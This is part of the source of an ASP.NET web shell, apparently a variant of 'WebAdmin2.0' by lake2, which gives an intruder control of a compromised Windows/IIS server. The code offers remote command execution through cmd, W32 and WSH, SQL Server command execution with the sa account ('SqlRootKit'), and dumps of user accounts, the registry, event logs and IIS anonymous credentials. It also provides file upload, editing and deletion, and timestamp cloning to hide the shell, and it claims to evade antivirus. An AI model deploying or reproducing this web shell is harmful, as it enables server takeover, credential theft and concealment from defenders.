<table align=center>
	<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
	<tr>
		<td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td>
		<td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td>
	</tr>
</table>
<%
	case "cmd"
%>
<form runat="server">
  <p>[ CMD.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute command with ASP.NET account(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p>
  Command:
  <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/>
  <p>
   <asp:Label ID="result" runat="server" style="style2"/>      </p>
</form>
<%
	case "cmdw32"
%>
<form runat="server">
	<p>[ ASP.NET W32 Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  	<p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  	Command:
	<asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/>
  	<asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>
  	<p>
    <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/>
    </p>
</form>
<%
	case "cmdwsh"
%>
<form runat="server">
	<p>[ ASP.NET WSH Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  	<p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  	Command:
	<asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/>
  	<asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>
  	<p>
    <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/>
    </p>
</form>
<%
	case "pro"
%>
<form runat="server">
	<p align=center>[ List processes from server ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<%
				Try
				output_wmi_function_data("Win32_Process","Name,ProcessId,HandleCount")
				Catch
				rw("This function is disabled by server")
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "user"
%>
<form runat="server">
	<p align=center>[ List User Accounts ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<%
				dim WMI_function = "Win32_UserAccount"
				dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID"
				dim fail_description = " Access to " + WMI_function + " is protected"
				Try
				output_wmi_function_data(WMI_function,Fields_to_load)
				Catch
				rw(fail_description)
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "reg"
%>
<form runat="server">
	<p align=center>[ Registry ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<%
				dim WMI_function = "Win32_Registry"
				dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status"
				dim fail_description = " Access to " + WMI_function + " is protected"
				Try
				output_wmi_function_data(WMI_function,Fields_to_load)
				Catch
				rw(fail_description)
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "applog"
%>
<form runat="server">
	<p align=center>[ List Application Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<%
				dim WMI_function = "Win32_NTLogEvent where Logfile='Application'"
				dim Fields_to_load = "Logfile,Message,type"
				dim fail_description = " Access to " + WMI_function + " is protected"
				Try
				output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
				Catch
				rw(fail_description)
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "syslog"
%>
<form runat="server">
	<p align=center>[ List System Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<%
				dim WMI_function = "Win32_NTLogEvent where Logfile='System'"
				dim Fields_to_load = "Logfile,Message,type"
				dim fail_description = " Access to " + WMI_function + " is protected"

				Try
				output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
				Catch
				rw("This function is disabled by server")
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "auser"
%>
<form runat="server">
	<p align=center>[ IIS List Anonymous' User details ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
	<table align=center>
		<tr>
			<td>
			<%
				Try
				IIS_list_Anon_Name_Pass
				Catch
				rw("This function is disabled by server")
				End Try
			%>
			</td>
		</tr>
	</table>
</form>
<%
	case "sqlrootkit"
%>
<form runat="server">
  <p>[ SqlRootKit.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  <p>Host:
    <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  <p>
  SQL Name:
    <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  SQL Password:
  <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/>
  </p>
  Command:
  <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/>
  <p>
   <asp:Label ID="resultSQL" runat="server" style="style2"/>      </p>
</form>
<%
	case "del"
		dim a as string
		a=request.QueryString("src")
		call existdir(a)
		call del(a)
		response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
	case "copy"
		call existdir(request.QueryString("src"))
		session("cutboard")="" & request.QueryString("src")
		response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
	case "cut"
		call existdir(request.QueryString("src"))
		session("cutboard")="" & request.QueryString("src")
		response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
	case "plaster"
		dim ow as integer
		if request.Form("OverWrite")<>"" then ow=1
		if request.Form("Cancel")<>"" then ow=2
		url=request.QueryString("src")
		call existdir(url)
		dim d as string
		d=session("cutboard")
		if left(d,1)="" then
			TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
			TEMP2=url & replace(path.getfilename(d),"","")
			if right(d,1)="\" then
				call xexistdir(TEMP1,ow)
				directory.move(replace(d,"",""),TEMP1 & "\")
				response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			else
				call xexistdir(TEMP2,ow)
				file.move(replace(d,"",""),TEMP2)
				response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			end if
		else
			TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
			TEMP2=url & path.getfilename(replace(d,"",""))
			if right(d,1)="\" then
				call xexistdir(TEMP1,ow)
				directory.createdirectory(TEMP1)
				call copydir(replace(d,"",""),TEMP1 & "\")
				response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			else
				call xexistdir(TEMP2,ow)
				file.copy(replace(d,"",""),TEMP2)
				response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
			end if
		end if
	case "upfile"
		url=request.QueryString("src")
%>
<form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server"  onSubmit="return checkname();">
 You will upload file to this directory : <span class="style3"><%=url%></span><br>
 Please choose file from your computer :
 <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server">
    <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a>
<%
	case "new"
		url=request.QueryString("src")
%>
<form runat="server">
  <%=url%><br>
  Name:
  <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  <br>
  <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server"  GroupName="New"/>
  <br>
  <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom"  OnClick="NewFD"/>
  <input name="Src" type="hidden" value="<%=url%>">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
	case "edit"
		dim b as string
		b=request.QueryString("src")
		call existdir(b)
		dim myread as new streamreader(b,encoding.default)
		filepath.text=b
		content.text=myread.readtoend
%>
<form runat="server">
  <table width="80%"  border="1" align="center">
    <tr>      <td width="11%">Path</td>
      <td width="89%">
      <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
      *</td>
    </tr>
    <tr>
      <td>Content</td>
      <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
    </tr>
    <tr>
      <td></td>
      <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/>
      </td>
    </tr>
  </table>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
  		myread.close
	case "rename"
		url=request.QueryString("src")
		if request.Form("name")="" then
	%>
<form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
  <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%>
    <input type="text" name="name" class="TextBox">
    <input type="submit" name="Submit3" value="Submit" class="buttom">
</p>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<script language="javascript">
function checkname()
{
if(formRn.name.value==""){alert("You shall input filename :(");return false}
}
</script>
  <%
		else
			if Rename() then
				response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
			else
				response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
			end if
		end if
	case "samename"
		url=request.QueryString("src")
%>
<form name="form1" method="post" action="?action=plaster&src=<%=server.UrlEncode(url)%>">
<p class="style3">Exist the same name file , can you overwrite ?(If you click &quot; no&quot; , it will auto add a number as prefix)</p>
  <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom">
<input name="Cancel" type="submit" id="Cancel" value="No" class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
   <%
    case "clonetime"
		time1.Text=request.QueryString("src")&"kshell.aspx"
		time2.Text=request.QueryString("src")
	%>
<form runat="server">
  <p>[CloneTime for WebAdmin]<i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:history.back(1);">Back</a></i> </p>
  <p>A tool that it copy the file or directory's time to another file or directory </p>
  <p>Rework File or Dir:
    <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p>
  <p>Copied File or Dir:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p>
<asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/>
</form>
<p>
  <%
	case "logout"
   		session.Abandon()
		response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>")
	end select
end if
Catch error_x
	response.Write("<font color=""red"">Wrong: </font>"&error_x.Message)
End Try
%>
</p>
</p>
<hr>
<script language="javascript">
function closewindow()
{self.close();}
</script>
<div align="center">Base on WebAdmin2.0(beta) By <a href="http://mrhupo.126.com" target="_blank" title="Welcome to my page:)">lake2</a> from China</div>
</body>
</html>